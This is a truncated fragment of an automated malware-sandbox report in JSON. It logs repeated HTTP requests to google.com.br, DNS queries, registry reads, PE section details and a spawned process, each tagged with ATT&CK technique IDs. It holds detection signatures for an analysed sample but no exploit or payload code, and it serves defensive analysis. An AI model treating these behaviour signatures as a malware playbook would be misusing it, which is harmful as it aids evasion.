==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yMIgAVKoBfW11m_IuxestQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:04 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eGIPyg1oy49lBYLkaN6gdAIrEr-67Hd3cFDqGW5uudpgdLDRA1vQ; expires=Tue\n 05-Aug-2025 09:12:04 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=AVqo9HA4ZLTbRACbkGArAHYGG3DiEgzl63exg1_3gvXKh8gprf1EIC2V7LJuOGJZ138-3i5Gzm88O5ZF6E0dB4VWA7IQi6zFAvx-r4a_5Hy_d9wgg7VOpc3C-KWVoY1W9bj725mGWOofaq2X12EWfwWvNBwpMRE2yeqB_Ox0pW2uAy5c3pVVawdP5VXFnv88Pjc0uKh_uGQfXOA; expires=Fri\n 08-Aug-2025 09:12:04 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9XuLsi30Y_6tovX1x8JsHg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:04 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eUKXRtSxc70c042uU1lUUlMxOruw9ya9l0QhA16kzT-QAVLxaZPQ; expires=Tue\n 05-Aug-2025 09:12:04 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=YEx9ImaTvFiT8MBF6HUGWp2yBmxJnM0KGr_3Hw7c9q64qnVDoYvxSboiMzISdStzvKdADciByjHhWe39z3uDxzpve00V_rhILClqwUWDtRdlmAgzGdA2bzEipDip1Cs5CBrr2YmeSI1MuVX3eSgDo1Q70QmsrrT8q-UqwjV2PTdTBxwe1SHhh9n6dI574LTbXwGvD5QPcjvlcQ; expires=Fri\n 08-Aug-2025 09:12:04 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CZB178F4EoMhaTI-aKU7-A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:05 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e3qUMrkkisExoDHkrSN8neoVptSYF-9_6DoWpQBHJUbyrnOLkJ7Q; expires=Tue\n 05-Aug-2025 09:12:05 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=fL2wmf8b_A7_5qfCn__8fMwkEBJeHM6dJYz-eKGzhkLbLtEvxculEf13sUl3VlyZVkfv2k1DIfy9ziZTmuUU4jdZzqXjf7Ui0sXRCW7y_6a825qfBko5u_BmK-oywRkZPkXoIqA57mxcySHMuyb205F2SM1_-71sCYm-knmhBntSdL-10Mn_BRA9nUmTWbBWkgJXreaIXX66NQ; expires=Fri\n 08-Aug-2025 09:12:05 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7hOaz7zBvQ7PqdbFj5n6XQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:05 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cbWp_zAoggpZAFaYWSjhpk371bGMNUMFb4JWLDRZDzDOu7R6BkE1A; expires=Tue\n 05-Aug-2025 09:12:05 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=LQxKUUJXfYKTsjCgir60tQ4se2tSzblFNJWP7iwt0JF0kMpDM46rx1aH8An4sZ8LeVGABkuFhUIWHnn0UUEpg4poOzRvS9w2oSkXPGyD-Aa-iNFhEoMIc9TsLWdBUMrc3wK8P1LQaRs2qZwXvLifVneCd4YL3muckRSKsbFoGfysKp5S8nyqxYexXaobU6T3Nc6pMJ7vgyxbPfU; expires=Fri\n 08-Aug-2025 09:12:05 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0fCpdqwd3bVC_zTgrAw1XA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:06 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e5wX1WWTEDOM-UL3xv7-1gUHytAJRaBfhzmq4h58JFxDGR-MhvSD4; expires=Tue\n 05-Aug-2025 09:12:06 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=S9vJ_mNYpx5R_WkKix2xY77FBLz7ZhcC8EgjrXt5uc30ewT8FNm5DedWLFPK2CxUX3vFZxk0Nb103u3GnoNb-VM0l4BOj4KeZcNCf_JHvxvoq2fNaQ02KLAOXaopONCQxxhMAATsyxAeokdLj-Ulwba-qdDGCuDzUchHe_9TH5bKjC8dtVS_9N-4VwqHxbRGg2SbAfKngW6947I; expires=Fri\n 08-Aug-2025 09:12:06 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-goP3IwjAuztZObDHYTBeew' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:06 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2ei61xFjq0IQTsiHE_sGfQ7wJlys-jBGJjYZgDwGhTQKLiIpzHkHio; expires=Tue\n 05-Aug-2025 09:12:06 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=iE_Pt4H87aUKaxFsUAMlXCQg9QW_iLS7q6bA3f2YLPzHpPR2Wfmv_J-W2I-We42yJ67Kboq8jIa3LfX0H6I0pOoAmYQfdzhot6dEDXS97hi_0lcr3AyS-kj1Ov3q8bdzUM9EGJY2Xy-gKW8xXUyLw7ISd9RYMbHEqh7z5k84LYozv6jTEAmeNiLnxmvUleFOWuCdZaltfYQzrQ; expires=Fri\n 08-Aug-2025 09:12:06 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-B9YwkSjSTIJDSb5FKIbacw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:07 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2flF8-YwE55qtSKyArcGh1If-B_KvV_dY7iitmSpeybhYR98IoUCA; expires=Tue\n 05-Aug-2025 09:12:07 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=GpR7xb3oUHO_L8evOrk_s_G3ejvpbuPapG3PGpK5FZA4JrCCcy2SKC6yr_VVaVx-Mw9EV5_9WjDkcy_8t9EQ1WXfVsJ7o2qou4LaPtYstibn_EkDwoCxSbEVq8aOCXPraCLeDo2h_an1TuPVfLn_IE0HN7HGBZ3x9KIqx8Bqz-B8woNbZ8yj0IGZNw-mqwYk9F3TXkzrgpnr0cY; expires=Fri\n 08-Aug-2025 09:12:07 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Z9XVucSrzBxv61q0s0XfGg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:07 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cj8WT-BhCXAnibLpKQZHuj3kOABWkZH-q5wKDjTYq7r2AxPh7VLSo; expires=Tue\n 05-Aug-2025 09:12:07 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=zb7TYDGaQtehyYOH0Wl0z6K1j_tHB5SnHB9T6_AVPtvDKZJeR9BBCbHQmT8syZvARzq6aV932Q4SgxR0lYAs-tih8J5einpHx2RIs3uCowXqY_O5P1UjImrXcM8hwAoLuYyb8WWc7jnCx9qX9BjNY_1vw3FcyIv2a-dR_Zld1voUS9pb_lDlqVg-Sudd3bUzJqUrnzVwAb0cF-w; expires=Fri\n 08-Aug-2025 09:12:07 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-mHTXkFFee63oX1Uf-Ho6cw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:08 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e4RVPuOfNeMht-UHBxLOYBgQzUmTbEwLRdHwXDeEW4qN-0u8ht1A; expires=Tue\n 05-Aug-2025 09:12:08 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=fjgKxCN9vZxSssOlXi8RTHqH67e6PPCbEdOHrM3c9W2ADlwn2jn9LOZWsEn9iqPhtwI9D-Jlc9F4x8e4o-9KlGq2fcGmGbT-OLO5-5wsZK3YVhSBGcxSnjiDd9kcT2NYDsCoRipjW0hPLyLOYTzP2V_EdNbyoxDgMaFkWpsU5tsbLZKXIG18w_MgXLUUVc6jzOryf9KLWcYZwQ; expires=Fri\n 08-Aug-2025 09:12:08 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-cxxjMXhrMjOJRQaTqAB7Dg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:08 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2frmSdhfvZ7NaKViMqXUlEGIaNqSVa102swzHXYGDeVIpMESsfx9Q; expires=Tue\n 05-Aug-2025 09:12:08 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=qO5IrOEqBWeEDcgJIZGNGUg0SrlPLIRvgg-LLYjHD8WU6cAcPP-5XutMC9IOmIGdtepY2sdPQONpiYOC09OS5ISqxHbA1YaQNJELv8pXT7Qrh2jBhKPlXAK4SrmGV2lYRCcyd8v2ygGC-e5cWk8p7zTgnPw0zOuc-UUUBYqiBH61tRXes4k-xY4hnRWFAh2TGQpSGpHNBRcUPHY; expires=Fri\n 08-Aug-2025 09:12:08 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-sFuHpRCEZZ7tT8EFMpwXdA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:09 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dgrWG1k3-f_8WEIte2Rb2N4JoT3Y5eTTHEOcF5SOAkH0b1C5TsWA; expires=Tue\n 05-Aug-2025 09:12:09 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=HC88uLaOem-8JovXs24CSp6TdwaslN4Bb892OYtLLk4nsHZxtBiAp4Mdbc0gwWW-bXPqAIMJVjxHS8HuzziLSihRuVNcwCQq548F6UNyTslCn-0iKV-2ESQoCI_IgTny6qmbvjpQpwO1fD9COHbpCH3m8fGUcFTGpZzcJ2rlU36e5nOwkR9GpdOsp3xaQbeCbmIGLEynK0NRBA; expires=Fri\n 08-Aug-2025 09:12:09 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DF0000\n \"upNext.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75DF0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has an executable section named \"CODE\"\n \"upNext.tmp\" has an executable section named \"CODE\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has an executable section named \"CODE\"\n \"DISMHOST.EXE.67A48282.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00002104)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has an writable section named \"DATA\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has an writable section named \"BSS\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has an writable section named \".idata\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" has an writable section named \".tls\"\n \"upNext.tmp\" has an writable section named \"DATA\"\n \"upNext.tmp\" has an writable section named \"BSS\"\n \"upNext.tmp\" has an writable section named \".idata\"\n \"upNext.tmp\" has an writable section named \".tls\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has an writable section named \"DATA\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has an writable section named \"BSS\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has an writable section named \".idata\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" has an writable section named \".tls\"\n \"DISMHOST.EXE.67A48282.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00002104)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"DISMHOST.EXE.67A48282.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"upNext.exe\" (UID: 00000000-00002104) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"upNext.exe\" (UID: 00000000-00002104) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"upNext.tmp\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A48282.bin\" was detected as \"Borland Delphi\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A48282.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\45E25AE0\"\n \"45E25AE0\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": 